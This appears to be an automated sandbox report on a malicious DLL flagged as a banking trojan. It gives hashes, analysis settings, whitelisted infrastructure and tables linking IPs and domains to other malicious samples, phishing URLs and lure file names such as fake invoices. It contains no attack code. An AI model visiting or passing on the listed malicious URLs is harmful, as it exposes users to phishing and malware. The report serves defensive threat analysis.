Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winDLL@32/166@16/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 90 Number of non-executed functions: 204
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 88.221.62.148, 131.253.33.203, 131.253.33.200, 13.107.22.200, 92.122.213.187, 92.122.213.231, 65.55.44.109, 104.84.56.24, 40.88.32.150, 51.11.168.160, 23.210.248.85, 13.64.90.137, 152.199.19.161, 20.54.26.129, 51.103.5.186, 92.122.213.247, 92.122.213.201, 104.43.139.144, 51.104.144.132, 168.61.161.212, 52.142.114.2, 52.251.11.100, 204.79.197.200, 13.107.21.200, 205.185.216.42, 205.185.216.10 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, wns.notify.windows.com.akadns.net, e11290.dspg.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, global.vortex.data.trafficmanager.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, updates.microsoft.com, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, c.bing.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, cs9.wpc.v0cdn.net, c-msn-com-nsatc.trafficmanager.net, c-bing-com.a-0001.a-msedge.net, bn2eap.displaycatalog.md.mp.microsoft.com.akadns.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iecvlist.microsoft.com, go.microsoft.com, emea1.notify.windows.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cds.d2s7q6s2.hwcdn.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, c1.microsoft.com, vip2-par02p.wns.notify.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:13:19	API Interceptor	36x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
87.248.118.23	http://www.prophecyhour.com	Get hash	malicious	Browse	us.i1.yimg.com/us.yimg.com/i/yg/img/i/us/ui/join.gif
	http://www.forestforum.co.uk/showthread.php?t=47811&page=19	Get hash	malicious	Browse	yui.yahooapis.com/2.9.0/build/animation/animation-min.js?v=4110
	http://ducvinhqb.com/service.html	Get hash	malicious	Browse	us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif
151.101.1.44	http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacb	Get hash	malicious	Browse	cdn.taboola.com/libtrc/w4llc-network/loader.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
contextual.media.net	DismCore.dll	Get hash	malicious	Browse	104.84.56.24
	gIVaVlt6tR.dll	Get hash	malicious	Browse	2.18.68.31
	xg.dll	Get hash	malicious	Browse	23.210.250.97
	TooltabExtension.dll	Get hash	malicious	Browse	23.210.250.97
	DataServer.dll	Get hash	malicious	Browse	23.210.250.97
	nsaCDED.dll	Get hash	malicious	Browse	104.84.56.24
	l0sjk3o.dll	Get hash	malicious	Browse	104.76.200.23
	mailsearcher32.dll	Get hash	malicious	Browse	104.76.200.23
	mailsearcher64.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Trojan.Emotet.1075.21287.dll	Get hash	malicious	Browse	92.122.146.68
	http://singaedental.vn/wp-content/lQ/	Get hash	malicious	Browse	104.76.200.23
	activex.dll	Get hash	malicious	Browse	104.76.200.23
	CcbOuuUuWG.dll	Get hash	malicious	Browse	23.210.250.97
	ps.dll	Get hash	malicious	Browse	104.76.200.23
	cl.dll	Get hash	malicious	Browse	104.76.200.23
	mal.dll	Get hash	malicious	Browse	104.76.200.23
	$R9QS3AG.dll	Get hash	malicious	Browse	104.84.56.24
	properties.dll	Get hash	malicious	Browse	104.84.56.24
	biden.dll	Get hash	malicious	Browse	104.84.56.24
	artifactuac32alt.dll	Get hash	malicious	Browse	23.54.113.52
tls13.taboola.map.fastly.net	DismCore.dll	Get hash	malicious	Browse	151.101.1.44
	gIVaVlt6tR.dll	Get hash	malicious	Browse	151.101.1.44
	xg.dll	Get hash	malicious	Browse	151.101.1.44
	TooltabExtension.dll	Get hash	malicious	Browse	151.101.1.44
	DataServer.dll	Get hash	malicious	Browse	151.101.1.44
	nsaCDED.dll	Get hash	malicious	Browse	151.101.1.44
	l0sjk3o.dll	Get hash	malicious	Browse	151.101.1.44
	mailsearcher32.dll	Get hash	malicious	Browse	151.101.1.44
	mailsearcher64.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.Emotet.1075.21287.dll	Get hash	malicious	Browse	151.101.1.44
	https://alijafari6.wixsite.com/owa-projection-aspx	Get hash	malicious	Browse	151.101.1.44
	http://singaedental.vn/wp-content/lQ/	Get hash	malicious	Browse	151.101.1.44
	activex.dll	Get hash	malicious	Browse	151.101.1.44
	https://xmailexpact.wixsite.com/mysite	Get hash	malicious	Browse	151.101.1.44
	CcbOuuUuWG.dll	Get hash	malicious	Browse	151.101.1.44
	ps.dll	Get hash	malicious	Browse	151.101.1.44
	cl.dll	Get hash	malicious	Browse	151.101.1.44
	mal.dll	Get hash	malicious	Browse	151.101.1.44
	$R9QS3AG.dll	Get hash	malicious	Browse	151.101.1.44
	http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacb	Get hash	malicious	Browse	151.101.1.44
hblg.media.net	DismCore.dll	Get hash	malicious	Browse	104.84.56.24
	gIVaVlt6tR.dll	Get hash	malicious	Browse	2.18.68.31
	xg.dll	Get hash	malicious	Browse	23.210.250.97
	TooltabExtension.dll	Get hash	malicious	Browse	23.210.250.97
	DataServer.dll	Get hash	malicious	Browse	23.210.250.97
	nsaCDED.dll	Get hash	malicious	Browse	104.84.56.24
	l0sjk3o.dll	Get hash	malicious	Browse	104.76.200.23
	mailsearcher32.dll	Get hash	malicious	Browse	104.76.200.23
	mailsearcher64.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Trojan.Emotet.1075.21287.dll	Get hash	malicious	Browse	92.122.146.68
	http://singaedental.vn/wp-content/lQ/	Get hash	malicious	Browse	104.76.200.23
	activex.dll	Get hash	malicious	Browse	104.76.200.23
	CcbOuuUuWG.dll	Get hash	malicious	Browse	23.210.250.97
	ps.dll	Get hash	malicious	Browse	104.76.200.23
	cl.dll	Get hash	malicious	Browse	104.76.200.23
	mal.dll	Get hash	malicious	Browse	104.76.200.23
	$R9QS3AG.dll	Get hash	malicious	Browse	104.84.56.24
	properties.dll	Get hash	malicious	Browse	104.84.56.24
	biden.dll	Get hash	malicious	Browse	104.84.56.24
	artifactuac32alt.dll	Get hash	malicious	Browse	23.54.113.52

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
YAHOO-DEBDE	DismCore.dll	Get hash	malicious	Browse	87.248.118.22
	gIVaVlt6tR.dll	Get hash	malicious	Browse	87.248.118.23
	xg.dll	Get hash	malicious	Browse	87.248.118.23
	equinix-customer-portal.apk	Get hash	malicious	Browse	87.248.118.22
	DataServer.dll	Get hash	malicious	Browse	87.248.118.22
	nsaCDED.dll	Get hash	malicious	Browse	87.248.118.22
	l0sjk3o.dll	Get hash	malicious	Browse	87.248.118.22
	parler.apk	Get hash	malicious	Browse	87.248.118.23
	parler.apk	Get hash	malicious	Browse	87.248.118.23
	AptoideTV-5.1.2.apk	Get hash	malicious	Browse	87.248.118.22
	com.parler.parler-2.6.6-free-www.apksum.com.apk	Get hash	malicious	Browse	87.248.118.23
	mailsearcher32.dll	Get hash	malicious	Browse	87.248.118.22
	https://1drv.ms:443/o/s!BAXL7VqGJe6lg0eKk2MZcT_c29ga?e=Qdftz9F3oESsQIuV76Ppsw&at=9	Get hash	malicious	Browse	87.248.118.23
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	87.248.118.23
	https://cypressbayhockey.com/NO	Get hash	malicious	Browse	87.248.118.23
	details.html	Get hash	malicious	Browse	87.248.118.23
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	87.248.118.22
	details.html	Get hash	malicious	Browse	87.248.118.22
	CcbOuuUuWG.dll	Get hash	malicious	Browse	87.248.118.22
	ps.dll	Get hash	malicious	Browse	87.248.118.22
FASTLYUS	DismCore.dll	Get hash	malicious	Browse	151.101.1.44
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	151.101.1.211
	purchase order TR2021011802.exe	Get hash	malicious	Browse	151.101.0.133
	Rx_r8wAQ.apk	Get hash	malicious	Browse	151.101.1.208
	Rx_r8wAQ.apk	Get hash	malicious	Browse	151.101.1.208
	TNT Original Invoice PDF.exe	Get hash	malicious	Browse	151.101.0.133
	9tyZf93qRdNHfVw.exe	Get hash	malicious	Browse	151.101.1.211
	UT45.vbs	Get hash	malicious	Browse	151.101.0.133
	gIVaVlt6tR.dll	Get hash	malicious	Browse	151.101.1.44
	33f77d4d.exe	Get hash	malicious	Browse	151.101.0.133
	RFQ_211844_PR20Q-6706.pdf.exe	Get hash	malicious	Browse	151.101.0.133
	xg.dll	Get hash	malicious	Browse	151.101.1.44
	Jasper-6.10.0.docx	Get hash	malicious	Browse	151.101.0.217
	15012021.exe	Get hash	malicious	Browse	151.101.2.159
	ESPP.docx	Get hash	malicious	Browse	151.101.112.193
	ESPP.docx	Get hash	malicious	Browse	151.101.112.193
	P.O.No.#17AUFR010S.pdf.exe	Get hash	malicious	Browse	151.101.0.133
	TooltabExtension.dll	Get hash	malicious	Browse	151.101.1.44
	fil1	Get hash	malicious	Browse	23.185.30.196
	PO#83922009122.pdf.exe	Get hash	malicious	Browse	151.101.0.133
WEBZILLANL	yvQpBRIhf9.exe	Get hash	malicious	Browse	208.69.117.117
	http://bigbinnd.info/vpmr21?x=Hp+officejet+j6480+all+in+one+service+manual	Get hash	malicious	Browse	188.72.236.136
	http://www.viportal.co	Get hash	malicious	Browse	78.140.179.159
	http://encar.club/000/?email=ingredients@chromadex.com&d=DwMFaQ	Get hash	malicious	Browse	88.85.75.98
	http://europeanclassiccomic.blogspot.com/2015/10/blueberry.html	Get hash	malicious	Browse	206.54.181.244
	http://www.tuckerdefense.com	Get hash	malicious	Browse	78.140.165.14
	http://coronavirus-map.com	Get hash	malicious	Browse	88.85.66.164
	http://fileupload-4.xyz/itmrZ27UrlVy2PNxP4jlcCnbvyR2nrQteqDjImiljTN2tc1tE-Had1Hn3ktIq5MHRPaSB0SPlgNWgdgFT4RdB1CYdBsmzEs-JIxLsTOcXPMOvCLsIENbyRJ9WOcaWmPEOVxD1i5QDOgUKB-VXy0Fkl4lDpg=	Get hash	malicious	Browse	88.85.69.166
	http://88.85.66.196	Get hash	malicious	Browse	88.85.66.196
	terminal.exe	Get hash	malicious	Browse	78.140.180.210
	t041PxnO3E.exe	Get hash	malicious	Browse	109.234.35.128
	LLoyds_Transaction_Log.pdf	Get hash	malicious	Browse	109.234.38.226
	Engde.doc	Get hash	malicious	Browse	109.234.39.133
	Engde.doc	Get hash	malicious	Browse	109.234.39.133
	http://pine-kko.com/sp.php?utm_medium=14187&file_name=mbox-1-driver&utm_source=AA1qYVtrNwAArLgBAEpQFwAmAJMX4MAA	Get hash	malicious	Browse	88.85.69.166
	http://mrvideo.in/	Get hash	malicious	Browse	78.140.165.10
	npkfe.exe	Get hash	malicious	Browse	46.30.45.85
	iNYNU6VuC7.exe	Get hash	malicious	Browse	178.208.83.56
	tecbwlrhv.exe	Get hash	malicious	Browse	46.30.45.85
	deutsche-bank-insured-deposit-program.doc	Get hash	malicious	Browse	46.30.40.107

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	DismCore.dll	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	PO-00172020.html	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	purchase order TR2021011802.exe	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	Dboom.HTM	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	#Ud83d#Udcde natasa.macovei@colt.net @ 1229 PM 1229 PM.pff.HTM	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	TNT Original Invoice PDF.exe	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	gIVaVlt6tR.dll	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	33f77d4d.exe	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	Joseph_stubenrauch.HTM	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	_130_WHAT_is.html	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	RFQ_211844_PR20Q-6706.pdf.exe	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	Payment Advice.xlsx	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	xg.dll	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	ESPP.docx	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	P.O.No.#17AUFR010S.pdf.exe	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	ACH PAYMENT REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	FastKeys_Setup.exe	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	TooltabExtension.dll	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	FastKeys_Setup.exe	Get hash	malicious	Browse	87.248.118.23 151.101.1.44
	PAYMENT DOCS.html	Get hash	malicious	Browse	87.248.118.23 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\AEPY7V7P\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3201
Entropy (8bit):	4.866612927705352
Encrypted:	false
SSDEEP:	96:aCCCXXx4XXX999e44N44CDj4CDjG4CDj4CDjk4CDjIw9Tw94:xw
MD5:	52172BFC02D3FBCBC8F90A8118239AEE
SHA1:	44AAE89536B735CC0C0B19AA8B95F80C0BDC2F03
SHA-256:	9B8715476524FD163B0FE83E516EDC85C467C66BCFB4BA9368F275D9978A280F
SHA-512:	DAB6DDB4039992CE39BF9FBA3F9DE498BA291ADF2C44FF892C57B4DCBBF181FEFE4BC3D719AEAA804410764A89306BD0D21DD9DD863A8FBD347F4ED0BB864EE9
Malicious:	false
Preview:	<root></root><root></root><root><item name="HBCM_BIDS" value="{}" ltime="925830928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="925830928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="925830928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="925830928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="926070928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="926070928" htime="30863007" /><item name="mntest" value="mntest" ltime="926190928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="926070928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="926070928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="926070928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="930350928" htime="30863007" /></root><root><item name="HBCM_BIDS" value="{}" ltime="930350928" htim

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\NEXO7ZY1\www.msn[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{721AB067-5A92-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	121192
Entropy (8bit):	2.2884872074042577
Encrypted:	false
SSDEEP:	384:rTq+9UManxeN25P+TiN3faHz6NrPnDQimY0Sl/NpbHZq:/yM2hfcB
MD5:	ADB53C4C32A40447723A406F844E0EB2
SHA1:	9B66F4A3CFA50D8A8566FC11C647ECC05C68716B
SHA-256:	B2ED4581BFB5B45D6377A344738B7BA79F5879C908C05D1423C432182603F649
SHA-512:	5D7C9936FCD6553B44CD8ADF189C57321B40106324A86BD5F9F546149BFFD19CB44C9C321C24763768D967481259F82A40F5BC204E647AE70377FD0B1418D172
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{721AB069-5A92-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	190638
Entropy (8bit):	3.5929668425819994
Encrypted:	false
SSDEEP:	3072:YrZ/2BfcYmu5kLTzGtRZ/2Bfc/mu5kLTzGt0:BQ/
MD5:	ECF175384179C04B777534C25FE7A100
SHA1:	D91105FFB705106729AAE9CC0CB3008A066C096C
SHA-256:	51FB504DFEBD19D5214AC3AFC38EC61EB091015058589979D409BEFBC0791548
SHA-512:	F1EEE1050FA16F79B801F66BD8167335186CFFA829EAEBDB4C2186E5870158A691208C2DC47AC1026FF3746F603DD6AC2893B2B758C4EB87CA04315CC004C590
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{ACF04278-5A92-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27380
Entropy (8bit):	1.850132681601594
Encrypted:	false
SSDEEP:	192:rBZSQS6oknFjh2wkWUM3YWk4bmJcxk4bmJkLuA:rH/91nhQ0B37k7kk74J
MD5:	578990811223E0D518505A3AE0BD4E8A
SHA1:	9743D91019A82BDC539F965A03868FA096D5776C
SHA-256:	2F49E5CCCA8635A220984641E59950AB7BA7EC537AAF99C264EBEA9B9E77E151
SHA-512:	FC1AF57892BCABAB011F38032C4529D07626FCBB06CDD639F7D207ABEEA2AAF9B60D762A7AA9D8EB9D616C38AE5B7FA972217E59D64D33A6A061D5B71F779E98
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BA4D6CF4-5A92-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27356
Entropy (8bit):	1.8410738251745389
Encrypted:	false
SSDEEP:	96:rLZAQ86OBSxFjR2pkWWMVYum1GibRm1GikmA:rLZAQ86OkxFjR2pkWWMVYumpbRmpkmA
MD5:	2B72AA40F0F8D8333F7DD477F7036D95
SHA1:	45DB60D60FB8DB14B70F335A155BBD82CC5C6589
SHA-256:	7676AA67A3E26F444D78739B309EAE3BB16CF6721B2F7E0E8A28E96C235D086C
SHA-512:	5DC21ACBE7DF6EA95C38ADFD9EC7524EF81962B8103E910ECE3DA3C746DC1DBC1C093415E5B30825B8C6F774D75AFEF38DEC7A101DD757034F4A7F0ECDD3817B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BA4D6CF6-5A92-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	1.8477707045991076
Encrypted:	false
SSDEEP:	192:rOZxQC6AkGFjB2kkWaMBYi6jx6qGx6jx6qnx6HiA:raGtNGhwQbBHrVr3HV
MD5:	82B762AB0C5592A1C4E31A07A67C30FB
SHA1:	0750E8A623AA19F661927F03A10A058CFB9E4777
SHA-256:	440658FC84C1E482D197FC2E7411B1CC0B72157C74993E495357B52BB365BEF2
SHA-512:	25B081770C189E514DD5AEEDB998264D93F4857EF180DE2089255D97D8CEEB090C5C29DB6BCC0CA7440DF345A0F9F7DDC9CEC2A152431B2206FACA14E88EF52A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BA4D6CF8-5A92-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	1.8446844743882513
Encrypted:	false
SSDEEP:	96:reZYQY6aBSQFjR2JkW3MuYi5EoOxh1+x5EoOxh1N2iA:reZYQY6akQFjR2JkW3MuYi5Zx55iA
MD5:	E8737239AB601328F46289968661E711
SHA1:	EEF3E4CF7B64319FD1EABE0A6CF057CA878666FC
SHA-256:	FE10CF8133B212756FEDCC97501A46678CE2AB9ACE85768382D7B2A71870283D
SHA-512:	0BE21F8A7E71A5151BC698E2A0715CF7B66485856AD9D3A6EF83D1C41099ED2A04EE6FBEB1237BDCD3F2443E630E88481E02015001AB5D9859411C0B8D3729D3
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C4E09CB2-5A92-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.566370463920031
Encrypted:	false
SSDEEP:	48:IwohGcprC6Gwpas7G4pQQjGrapbSEqrGQpKaQG7HpRZsTGIpG:rkZDQsd6SBSpFAYTZ4A
MD5:	9884A0E3804FA7705AE7922A89D6827F
SHA1:	972B549E9A5C7D7FE719AC0ED6B4643BA908F26F
SHA-256:	F00F39D712B89DFC188B2EBF4A8D9F5BD66E0AF01DD423FDB1C3CA161125BCD3
SHA-512:	4525327D6F79A00C536283FE430E4DA13DF300D582A911C446979FF8684EEE2244D845C562F55B215F92231198CAFE58690D0A7C876422E0D2DFD715F2EBCFFF
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.099492812045459
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEwST19SST191nWimI002EtM3MHdNMNxOEwST19SST191nWimI00ObV6:2d6NxOuBxSZHKd6NxOuBxSZ76b
MD5:	5CC48588DBC79F184DC6E611CD98E552
SHA1:	111369BEBEBA1612B7D4C3049FA24381A8AF34DF
SHA-256:	D50192DE867C366156107ADF737ECF5FBD2F4F5A4530A27E2883342EF25FEBF3
SHA-512:	E7CE8BD838DA7C23433D5F4F122EF6CEC695F647C584116C121903720D30103706284F9F4C4AAA8818E6A011861C6ABF45D1792514645864DA4156D6F1546CEB
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48767fe3,0x01d6ee9f</date><accdate>0x48767fe3,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48767fe3,0x01d6ee9f</date><accdate>0x48767fe3,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.116954496618358
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kwSeVmSSeVm1nWimI002EtM3MHdNMNxe2kwSeVmSSeVm1nWimI00Ob:2d6Nxrn5cSZHKd6Nxrn5cSZ7Aa7b
MD5:	6AF03455303F8DDD39E2ECB1F8EC79AC
SHA1:	521F9767705B77B968AAA98107233D01E5F25AA6
SHA-256:	14C62198ADA413F9C6DE0312B243E3A69E6020B8EC524452EDAF1A6388732544
SHA-512:	BD3C46EC13CD664BF475EE981277B6B8C3BCB3F7B6186235F0141D6BB4972855DD4A5805F7AFD93BBBE854FDAD20C3D6AA22C481F8C954E2650184CC5150AFA8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x4871bb1e,0x01d6ee9f</date><accdate>0x4871bb1e,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x4871bb1e,0x01d6ee9f</date><accdate>0x4871bb1e,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.119450730629899
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLwST19SST191nWimI002EtM3MHdNMNxvLwST19SST191nWimI00Obmf:2d6Nxv/BxSZHKd6Nxv/BxSZ7mb
MD5:	29C1CB3E3B5D37DAFF028C12EF3055BF
SHA1:	BCA6FEC26C9E21E5725DC36F57F2D3663BCEE55E
SHA-256:	265C04D1A1C11E2C843997D4771625017694669FE465A6D550BB9E93DA9CEDA8
